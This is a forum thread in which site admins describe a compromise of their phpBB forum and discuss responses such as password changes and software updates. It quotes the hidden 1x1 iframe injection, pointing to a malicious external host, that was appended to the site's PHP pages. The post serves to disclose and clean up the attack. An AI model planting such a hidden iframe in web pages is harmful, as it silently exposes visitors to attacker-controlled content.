Hacking attempt.

[sbando]

Someone injected the forum with a virus, Nop cleaned all the affected pages.

What gives it away is this malicious code

Code: Select all

<iframe heigth="1" width="1" frameborder="0" src=MailScanner has detected a possible fraud attempt from "curem.net" claiming to be "http://curem.net/t.php?id=1461961"></iframe>


at the end of php pages.

Nop quickly determined that someone or something stole my ftp password (you can read about the curem.net virus all over the Net).


ANYWAY, Bunny and me are pretty sure now that the same kid (or someone else) is also trying to bruteforce admin credentials, please change all your password to something long and complicated.

[paroxysmia]

http://strongpasswordgenerator.com/

[paroxysmia]

And did you check phpBB is up-to-date?

[sbando]

Nop will update the forum too.
It's not a security breach in the forum's software, though, someone is trying to guess our passwords.
In the first case, the virus stole my ftp credentials and then connected to they site.

[paroxysmia]

Do you know the duration of the forum infection?

And do you think (or another admin) some users might be infected silently? (trojans etc)

[sbando]

I dunno if the iframe injection in case can affect the actual users or other sites, but I suggest you change your forum pw and recreate any ftp account you might have stored in your ftp client.

[paroxysmia]

Pwd already changed. And I don't have any FTP account. Thx.

[Mr_White]

wtf is an FTP account?

Sorry for asking, but I really dunno.
OTOH it seems that somebody is trying to guess passwords. After typing in my password I received an "You had too many fail login attempts" message. Which is funny, because it was my first login today. But that bullshit dude will have a hard time to guess my new and improved password....